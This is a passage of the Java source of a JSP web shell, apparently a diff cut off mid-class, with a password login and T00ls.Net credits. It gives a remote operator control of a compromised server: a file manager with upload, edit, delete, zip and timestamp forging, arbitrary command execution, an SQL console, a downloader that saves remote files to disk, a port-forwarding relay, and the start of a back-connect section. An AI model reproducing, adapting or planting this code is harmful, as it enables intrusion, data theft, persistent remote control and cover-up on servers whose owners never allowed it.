    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VConnInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object obj = JSession.getAttribute(DBO); +if (obj == null || !((DBOperator)obj).isValid()) { +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//DBConnect +private static class DbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String driver = request.getParameter("driver"); +String url = request.getParameter("url"); +String uid = request.getParameter("uid"); +String pwd = request.getParameter("pwd"); +String sql = request.getParameter("sql"); +String selectDb = request.getParameter("selectDb"); +if (selectDb == null) +selectDb = JSession.getAttribute("selectDb").toString(); +else +JSession.setAttribute("selectDb",selectDb); +Object dbo = JSession.getAttribute(DBO); +if (dbo == null || !((DBOperator)dbo).isValid()) { +if (dbo != null) +((DBOperator)dbo).close(); +dbo = new DBOperator(driver,url,uid,pwd,true); +} else { +if (!Util.isEmpty(driver) && !Util.isEmpty(url) && !Util.isEmpty(uid)) { +DBOperator oldDbo = (DBOperator)dbo; +dbo = new DBOperator(driver,url,uid,pwd); +if (!oldDbo.equals(dbo)) { +((DBOperator)oldDbo).close(); +((DBOperator)dbo).connect(); +} else { +dbo = oldDbo; +} +} +} +DBOperator Ddbo = (DBOperator)dbo; +JSession.setAttribute(DBO,Ddbo); +Util.outMsg(out,"Connect To DataBase Success!"); +out.println(" "); +out.println("
    "+ +"
    "+ +""+ +"

    DataBase Manager »

    "+ +""+ +"

    "+ +"Driver:"+ +" "+ +"URL:"+ +""+ +"UID:"+ +""+ +"PWD:"+ +""+ +"DataBase:"+ +" "+ +""+ +"

    "+ +"
    "); +out.println("
    "+ +"

    Run SQL query/queries on database :

    "); +} catch (Exception e) { +//e.printStackTrace(); +throw e; +} +} +} +private static class ExecuteSQLInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String sql = request.getParameter("sql"); +String db = request.getParameter("selectDb"); +Object dbo = JSession.getAttribute(DBO); +if (!Util.isEmpty(sql)) { +if (dbo == null || !((DBOperator)dbo).isValid()) { +response.sendRedirect(SHELL_NAME+"?o=vConn"); +} else { +ins.get("dbc").invoke(request,response,JSession); +Object obj = ((DBOperator)dbo).execute(sql); +if (obj instanceof ResultSet) { +ResultSet rs = (ResultSet)obj; +ResultSetMetaData meta = rs.getMetaData(); +int colCount = meta.getColumnCount(); +out.println("

    Query#0 : "+Util.htmlEncode(sql)+"

    "); +out.println(""); +for (int i=1;i<=colCount;i++) { +out.println(""); +} +out.println(""); +Table tb = new Table(); +while(rs.next()) { +Row r = new Row(); +for (int i = 1;i<=colCount;i++) { +r.addColumn(new Column(rs.getString(i))); +} +tb.addRow(r); +} +out.println(tb.toString()); +out.println("
    "+meta.getColumnName(i)+"
    "+meta.getColumnTypeName(i)+"
    "); +rs.close(); +((DBOperator)dbo).closeStmt(); +} else { +out.println("

    affected rows : "+obj+"

    "); +} +} +} else { +ins.get("dbc").invoke(request,response,JSession); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VLoginInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +out.println("
    "+ +"

    Password: "+ +" "+ +" "+ +" "+ +"

    "+ +" "+ +"Copyright © 2012 Admin www.baidu.com

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class LoginInvoker extends DefaultInvoker{ +public boolean doBefore() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String inputPw = request.getParameter("pw"); +if (Util.isEmpty(inputPw) || !inputPw.equals(PW)) { +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +return; +} else { +JSession.setAttribute(PW_SESSION_ATTRIBUTE,inputPw); +response.sendRedirect(SHELL_NAME+"?o=index"); +return; +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MyComparator implements Comparator{ +public int compare(File f1,File f2) { +if (f1 != null && f2!= null) { +if (f1.isDirectory()) { +if (f2.isDirectory()) { +return f1.getName().compareTo(f2.getName()); +} else { +return -1; +} +} else { +if (f2.isDirectory()) { +return 1; +} else { +return f1.getName().compareTo(f2.getName()); +} +} +} +return 0; +} +} +private static class FileListInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception { +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("folder"); +if (Util.isEmpty(path)) +path = JSession.getAttribute(CURRENT_DIR).toString(); + +JSession.setAttribute(CURRENT_DIR,Util.convertPath(path)); +File file = new File(path); +if (!file.exists()) { +throw new Exception(path+"Dont Exists !"); +} +JSession.setAttribute(CURRENT_DIR,path); +File[] list = file.listFiles(); +Arrays.sort(list,new MyComparator()); +out.println("
    "); +String cr = null; +try { +cr = JSession.getAttribute(CURRENT_DIR).toString().substring(0,3); +}catch(Exception e) { +cr = "/"; +} +File currentRoot = new File(cr); +out.println("

    File Manager - Current disk ""+(cr.indexOf("/") == 0?"/":currentRoot.getPath())+"" total (unknow)

    "); +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Current Directory
    "+ +"
    "); +out.println(""+ +""+ +""+ +""+ +" "+ +" "+ +" "+ +" "+ +" "+ +""); +if (file.getParent() != null) { +out.println(""+ +""+ +""+ +""); +} +int dircount = 0; +int filecount = 0; +for (File f:list) { +if (f.isDirectory()) { +dircount ++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} else { +filecount++; +out.println(""+ +""+ +""+ +""+ +""+ +""+ +""+ +""); +} +} +out.println(""+ +" "+ +" "+ +"
    "+ +"
    "+ +"Web Root"+ +" | Shell Directory"+ +" | New Directory | New File"+ +" | "); +File[] roots = file.listRoots(); +for (int i = 0;iDisk("+Util.convertPath(r.getPath())+")"); +if (i != roots.length -1) { +out.println("|"); +} +} +out.println("
     NameLast ModifiedSizeRead/Write/Execute 
    =Goto Parent
    0"+f.getName()+""+Util.formatDate(f.lastModified())+"--"+f.canRead()+" / "+f.canWrite()+" / unknow Del | Move | Pack
    "+f.getName()+""+Util.formatDate(f.lastModified())+""+Util.getSize(f.length(),'B')+""+ +""+f.canRead()+" / "+f.canWrite()+" / unknow "+ +"Edit | "+ +"Down | "+ +"Copy | "+ +"Move | "+ +"Property"); +if (f.getName().endsWith(".zip")) { +out.println(" | UnPack"); +} else if (f.getName().endsWith(".rar")) { +out.println(" | UnPack"); +} else { +out.println(" | Pack"); +} +out.println("
     Pack Selected - Delete Selected"+dircount+" directories / "+filecount+" files
    "); +out.println("
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e; +} +} +} +private static class LogoutInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object dbo = JSession.getAttribute(DBO); +if (dbo != null) +((DBOperator)dbo).close(); +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +Object online = JSession.getAttribute(SHELL_ONLINE); +if (online != null) +((OnLineProcess)online).stop(); +JSession.invalidate(); +response.sendRedirect(SHELL_NAME+"?o=vLogin"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class UploadInvoker extends DefaultInvoker { +public boolean doBefore() {return false;} +public boolean doAfter() {return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +UploadBean fileBean = new UploadBean(); +response.getWriter().println(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.setSavePath(JSession.getAttribute(CURRENT_DIR).toString()); +fileBean.parseRequest(request); +JSession.setAttribute(MSG,"Upload File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CopyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String src = request.getParameter("src"); +String to = request.getParameter("to"); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(new File(src))); +BufferedOutputStream output = new BufferedOutputStream(new FileOutputStream(new File(to))); +byte[] d = new byte[1024]; +int len = input.read(d); +while(len != -1) { 
+output.write(d,0,len);
+len = input.read(d);
+}
+output.close();
+input.close();
+JSession.setAttribute(MSG,"Copy File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class BottomInvoker extends DefaultInvoker {
+public boolean doBefore() {return false;}
+public boolean doAfter() {return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+response.getWriter().println("
    Copyright (C) 2009 http://www.baidu.com/  [T00ls.Net] All Rights Reserved."+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VCreateFileInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (!f.isAbsolute()) { +String oldPath = path; +path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path+="/"; +path+=oldPath; +f = new File(path); +f.createNewFile(); +} else { +f.createNewFile(); +} +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +File f = new File(path); +if (f.exists()) { +BufferedReader reader = new BufferedReader(new FileReader(f)); +StringBuilder content = new StringBuilder(); +String s = reader.readLine(); +while (s != null) { +content.append(s+"\r\n"); +s = reader.readLine(); +} +reader.close(); +out.println("
    "+ +"
    "+ +"

    Create / Edit File »

    "+ +""+ +"

    Current File (import new file name and new file)

    "+ +"

    File Content

    "+ +"

    "+ +"
    "+ +"
    "); +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class CreateFileInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String path = request.getParameter("filepath"); +String content = request.getParameter("filecontent"); + +BufferedWriter outs = new BufferedWriter(new FileWriter(new File(path))); +outs.write(content,0,content.length()); +outs.close(); +JSession.setAttribute(MSG,"Save File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class VEditPropertyInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String filepath = request.getParameter("filepath"); +File f = new File(filepath); +if (!f.exists()) +return; +String read = f.canRead() ? "checked=\"checked\"" : ""; +String write = f.canWrite() ? "checked=\"checked\"" : ""; +String execute = ""; +Calendar cal = Calendar.getInstance(); +cal.setTimeInMillis(f.lastModified()); + +out.println("
    "+ +"
    "+ +"

    Set File Property »

    "+ +"

    Current file (fullpath)

    "+ +" "+ +"

    Read: "+ +" "+ +" Write: "+ +" "+ +" Execute: "+ +" "+ +"

    "+ +"

    Instead »"+ +"year:"+ +""+ +"month:"+ +""+ +"day:"+ +""+ +""+ +"hour:"+ +""+ +"minute:"+ +""+ +"second:"+ +""+ +"

    "+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class EditPropertyInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String f = request.getParameter("file"); +File file = new File(f); +if (!file.exists()) +return; + +String year = request.getParameter("year"); +String month = request.getParameter("month"); +String date = request.getParameter("date"); +String hour = request.getParameter("hour"); +String minute = request.getParameter("minute"); +String second = request.getParameter("second"); + +Calendar cal = Calendar.getInstance(); +cal.set(Calendar.YEAR,Integer.parseInt(year)); +cal.set(Calendar.MONTH,Integer.parseInt(month)-1); +cal.set(Calendar.DATE,Integer.parseInt(date)); +cal.set(Calendar.HOUR,Integer.parseInt(hour)); +cal.set(Calendar.MINUTE,Integer.parseInt(minute)); +cal.set(Calendar.SECOND,Integer.parseInt(second)); +if(file.setLastModified(cal.getTimeInMillis())){ +JSession.setAttribute(MSG,"Reset File Property Success!"); +} else { +JSession.setAttribute(MSG,"Reset File Property Failed!"); +} +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VShell +private static class VsInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String cmd = request.getParameter("command"); +String program = request.getParameter("program"); +if (cmd == null) cmd = "cmd.exe /c set"; +if (program == null) program = "cmd.exe /c net start > "+SHELL_DIR+"/Log.txt"; +if (JSession.getAttribute(MSG)!=null) { +Util.outMsg(out,JSession.getAttribute(MSG).toString()); +JSession.removeAttribute(MSG); +} +out.println(""+ +"
    "+ +"
    "+ +"

    Execute Program »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "+ +"

    Execute Shell »

    "+ +"

    "+ +""+ +""+ +"Parameter
    "+ +""+ +"

    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class ShellInvoker extends DefaultInvoker{ +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String type = request.getParameter("type"); +if (type.equals("command")) { +ins.get("vs").invoke(request,response,JSession); +out.println("

    "); +out.println("
    ");
    +String command = request.getParameter("command");
    +if (!Util.isEmpty(command)) {
    +Process pro = Runtime.getRuntime().exec(command);
    +BufferedReader reader = new BufferedReader(new InputStreamReader(pro.getInputStream()));
    +String s = reader.readLine();
    +while (s != null) {
    +out.println(Util.htmlEncode(Util.getStr(s)));
    +s = reader.readLine();
    +}
    +reader.close();
    +out.println("
    "); +} +} else { +String program = request.getParameter("program"); +if (!Util.isEmpty(program)) { +Process pro = Runtime.getRuntime().exec(program); +JSession.setAttribute(MSG,"Program Has Run Success!"); +ins.get("vs").invoke(request,response,JSession); +} +} +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownInvoker extends DefaultInvoker{ +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String path = request.getParameter("path"); +if (Util.isEmpty(path)) +return; +File f = new File(path); +if (!f.exists()) +return; +response.setHeader("Content-Disposition","attachment;filename="+URLEncoder.encode(f.getName(),PAGE_CHARSET)); +BufferedInputStream input = new BufferedInputStream(new FileInputStream(f)); +BufferedOutputStream output = new BufferedOutputStream(response.getOutputStream()); +byte[] data = new byte[1024]; +int len = input.read(data); +while (len != -1) { +output.write(data,0,len); +len = input.read(data); +} +input.close(); +output.close(); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VDown +private static class VdInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String savepath = request.getParameter("savepath"); +String url = request.getParameter("url"); +if (Util.isEmpty(url)) +url = "http://www.baidu.com/"; +if (Util.isEmpty(savepath)) { +savepath = JSession.getAttribute(CURRENT_DIR).toString(); +} +if (!Util.isEmpty(JSession.getAttribute("done"))) { +Util.outMsg(out,"Download Remote File Success!"); +JSession.removeAttribute("done"); +} +out.println("
    "+ +"
    "+ +"

    Remote File DownLoad »

    "+ +"

    "+ +""+ +"Remote File URL:"+ +" "+ +"Save Path:"+ +""+ +""+ +"

    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class DownRemoteInvoker extends DefaultInvoker { +public boolean doBefore(){return true;} +public boolean doAfter(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String downFileUrl = request.getParameter("url"); +String savePath = request.getParameter("savepath"); +if (Util.isEmpty(downFileUrl) || Util.isEmpty(savePath)) +return; +URL downUrl = new URL(downFileUrl); +URLConnection conn = downUrl.openConnection(); +BufferedInputStream in = new BufferedInputStream(conn.getInputStream()); +BufferedOutputStream out = new BufferedOutputStream(new FileOutputStream(new File(savePath))); +byte[] data = new byte[1024]; +int len = in.read(data); +while (len != -1) { +out.write(data,0,len); +len = in.read(data); +} +in.close(); +out.close(); +JSession.setAttribute("done","d"); +ins.get("vd").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class IndexInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +ins.get("filelist").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MkDirInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +String name = request.getParameter("name"); +File f = new File(name); +if (!f.isAbsolute()) { +String path = JSession.getAttribute(CURRENT_DIR).toString(); +if (!path.endsWith("/")) +path += "/"; +path += name; +f = new File(path); +} +f.mkdirs(); +JSession.setAttribute(MSG,"Make Directory Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); 
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class MoveInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+PrintWriter out = response.getWriter();
+String src = request.getParameter("src");
+String target = request.getParameter("to");
+if (!Util.isEmpty(target) && !Util.isEmpty(src)) {
+File file = new File(src);
+if(file.renameTo(new File(target))) {
+JSession.setAttribute(MSG,"Move File Success!");
+} else {
+String msg = "Move File Failed!";
+if (file.isDirectory()) {
+msg += "The Move Will Failed When The Directory Is Not Empty.";
+}
+JSession.setAttribute(MSG,msg);
+}
+response.sendRedirect(SHELL_NAME+"?o=index");
+}
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+}
+private static class RemoteDirInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String dir = request.getParameter("dir");
+File file = new File(dir);
+if (file.exists()) {
+deleteFile(file);
+deleteDir(file);
+}
+
+JSession.setAttribute(MSG,"Remove Directory Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e ;
+}
+}
+public void deleteFile(File f) {
+if (f.isFile()) {
+f.delete();
+}else {
+File[] list = f.listFiles();
+for (File ff:list) {
+deleteFile(ff);
+}
+}
+}
+public void deleteDir(File f) {
+File[] list = f.listFiles();
+if (list.length == 0) {
+f.delete();
+} else {
+for (File ff:list) {
+deleteDir(ff);
+}
+deleteDir(f);
+}
+}
+}
+private static class PackBatchInvoker extends DefaultInvoker{
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void
invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String files = request.getParameter("files");
+if (Util.isEmpty(files))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String[] arr = files.split(",");
+for (String f:arr) {
+File pF = new File(JSession.getAttribute(CURRENT_DIR).toString(),f);
+ZipEntry entry = new ZipEntry(pF.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(pF);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack Files Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+}
+private static class PackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String packedFile = request.getParameter("packedfile");
+if (Util.isEmpty(packedFile))
+return;
+String saveFileName = request.getParameter("savefilename");
+File saveF = new File(JSession.getAttribute(CURRENT_DIR).toString(),saveFileName);
+if (saveF.exists()) {
+JSession.setAttribute(MSG,"The File \""+saveFileName+"\" Has Been Exists!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+return;
+}
+File pF = new File(packedFile);
+ZipOutputStream zout = new ZipOutputStream(new BufferedOutputStream(new FileOutputStream(saveF)));
+String base = "";
+if
(pF.isDirectory()) {
+zipDir(pF,base,zout);
+} else {
+zipFile(pF,base,zout);
+}
+zout.close();
+JSession.setAttribute(MSG,"Pack File Success!");
+response.sendRedirect(SHELL_NAME+"?o=index");
+} catch (Exception e) {
+e.printStackTrace();
+throw e;
+}
+}
+public void zipDir(File f,String base,ZipOutputStream zout) throws Exception {
+if (f.isDirectory()) {
+File[] arr = f.listFiles();
+for (File ff:arr) {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) && !tmpBase.endsWith("/"))
+tmpBase += "/";
+zipDir(ff,tmpBase+f.getName(),zout);
+}
+} else {
+String tmpBase = base;
+if (!Util.isEmpty(tmpBase) &&!tmpBase.endsWith("/"))
+tmpBase += "/";
+zipFile(f,tmpBase,zout);
+}
+}
+public void zipFile(File f,String base,ZipOutputStream zout) throws Exception{
+ZipEntry entry = new ZipEntry(base+f.getName());
+zout.putNextEntry(entry);
+FileInputStream fInput = new FileInputStream(f);
+int len = 0;
+byte[] buf = new byte[1024];
+while ((len = fInput.read(buf)) != -1) {
+zout.write(buf, 0, len);
+zout.flush();
+}
+fInput.close();
+}
+}
+private static class UnPackInvoker extends DefaultInvoker {
+public boolean doBefore(){return false;}
+public boolean doAfter(){return false;}
+public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{
+try {
+String savepath = request.getParameter("savepath");
+String zipfile = request.getParameter("zipfile");
+if (Util.isEmpty(savepath) || Util.isEmpty(zipfile))
+return;
+File save = new File(savepath);
+save.mkdirs();
+ZipFile file = new ZipFile(new File(zipfile));
+Enumeration e = file.entries();
+while (e.hasMoreElements()) {
+ZipEntry en = (ZipEntry) e.nextElement();
+String entryPath = en.getName();
+int index = entryPath.lastIndexOf("/");
+if (index != -1)
+entryPath = entryPath.substring(0,index);
+File absEntryFile = new File(save,entryPath);
+if (!absEntryFile.exists() && (en.isDirectory() || en.getName().indexOf("/") != -1))
+absEntryFile.mkdirs();
+BufferedOutputStream
output = null; +BufferedInputStream input = null; +try { +output = new BufferedOutputStream( +new FileOutputStream(new File(save,en.getName()))); +input = new BufferedInputStream( +file.getInputStream(en)); +byte[] b = new byte[1024]; +int len = input.read(b); +while (len != -1) { +output.write(b, 0, len); +len = input.read(b); +} +} catch (Exception ex) { +} finally { +try { +if (output != null) +output.close(); +if (input != null) +input.close(); +} catch (Exception ex1) { +} +} +} +file.close(); +JSession.setAttribute(MSG,"Unzip File Success!"); +response.sendRedirect(SHELL_NAME+"?o=index"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VMapPort +private static class VmpInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object localIP = JSession.getAttribute("localIP"); +Object localPort = JSession.getAttribute("localPort"); +Object remoteIP = JSession.getAttribute("remoteIP"); +Object remotePort = JSession.getAttribute("remotePort"); +Object done = JSession.getAttribute("done"); + +JSession.removeAttribute("localIP"); +JSession.removeAttribute("localPort"); +JSession.removeAttribute("remoteIP"); +JSession.removeAttribute("remotePort"); +JSession.removeAttribute("done"); + +if (Util.isEmpty(localIP)) +localIP = InetAddress.getLocalHost().getHostAddress(); +if (Util.isEmpty(localPort)) +localPort = "3389"; +if (Util.isEmpty(remoteIP)) +remoteIP = "www.baidu.com"; +if (Util.isEmpty(remotePort)) +remotePort = "80"; +if (!Util.isEmpty(done)) +Util.outMsg(out,done.toString()); + +out.println("
    "+ +""+ +" "+ +" "+ +" "+ +""+ +"

    PortMap >>

    "+ +"
    "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +" "+ +"
    Local Ip :"+ +" "+ +" Local Port :"+ +" Remote Ip :"+ +" Remote Port :"+ +"

    "+ +" "+ +" "+ +"
    "+ +"
    "+ +"
    "+ +"
    "); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//StopMapPort +private static class SmpInvoker extends DefaultInvoker { +public boolean doAfter(){return true;} +public boolean doBefore(){return true;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket server = (ServerSocket)JSession.getAttribute(PORT_MAP); +server.close(); +} +JSession.setAttribute("done","Stop Success!"); +ins.get("vmp").invoke(request,response,JSession); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +private static class MapPortInvoker extends DefaultInvoker { +public boolean doBefore(){return false;} +public boolean doAfter(){return false;} +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +String localIP = request.getParameter("localIP"); +String localPort = request.getParameter("localPort"); +final String remoteIP = request.getParameter("remoteIP"); +final String remotePort = request.getParameter("remotePort"); +if (Util.isEmpty(localIP) || Util.isEmpty(localPort) || Util.isEmpty(remoteIP) || Util.isEmpty(remotePort)) +return; +Object obj = JSession.getAttribute(PORT_MAP); +if (obj != null) { +ServerSocket s = (ServerSocket)obj; +s.close(); +} +final ServerSocket server = new ServerSocket(); +server.bind(new InetSocketAddress(localIP,Integer.parseInt(localPort))); +JSession.setAttribute(PORT_MAP,server); +new Thread(new Runnable(){ +public void run(){ +while (true) { +Socket soc = null; +Socket remoteSoc = null; +DataInputStream remoteIn = null; +DataOutputStream remoteOut = null; +DataInputStream localIn = null; +DataOutputStream localOut = null; +try{ +soc = server.accept(); +remoteSoc = new Socket(); +remoteSoc.connect(new InetSocketAddress(remoteIP,Integer.parseInt(remotePort))); 
+remoteIn = new DataInputStream(remoteSoc.getInputStream()); +remoteOut = new DataOutputStream(remoteSoc.getOutputStream()); +localIn = new DataInputStream(soc.getInputStream()); +localOut = new DataOutputStream(soc.getOutputStream()); +this.readFromLocal(localIn,remoteOut); +this.readFromRemote(soc,remoteSoc,remoteIn,localOut); +}catch(Exception ex) +{ +break; +} +} +} +public void readFromLocal(final DataInputStream localIn,final DataOutputStream remoteOut){ +new Thread(new Runnable(){ +public void run(){ +while (true) { +try{ +byte[] data = new byte[100]; +int len = localIn.read(data); +while (len != -1) { +remoteOut.write(data,0,len); +len = localIn.read(data); +} +}catch (Exception e) { +break; +} +} +} +}).start(); +} +public void readFromRemote(final Socket soc,final Socket remoteSoc,final DataInputStream remoteIn,final DataOutputStream localOut){ +new Thread(new Runnable(){ +public void run(){ +while(true) { +try{ +byte[] data = new byte[100]; +int len = remoteIn.read(data); +while (len != -1) { +localOut.write(data,0,len); +len = remoteIn.read(data); +} +}catch (Exception e) { +try{ +soc.close(); +remoteSoc.close(); +}catch(Exception ex) { +} +break; +} +} +} +}).start(); +} +}).start(); +JSession.setAttribute("done","Map Port Success!"); +JSession.setAttribute("localIP",localIP); +JSession.setAttribute("localPort",localPort); +JSession.setAttribute("remoteIP",remoteIP); +JSession.setAttribute("remotePort",remotePort); +response.sendRedirect(SHELL_NAME+"?o=vmp"); +} catch (Exception e) { +e.printStackTrace(); +throw e ; +} +} +} +//VBackConnect +private static class VbcInvoker extends DefaultInvoker { +public void invoke(HttpServletRequest request,HttpServletResponse response,HttpSession JSession) throws Exception{ +try { +PrintWriter out = response.getWriter(); +Object ip = JSession.getAttribute("ip"); +Object port = JSession.getAttribute("port"); +Object program = JSession.getAttribute("program"); +Object done = JSession.getAttribute("done"); 
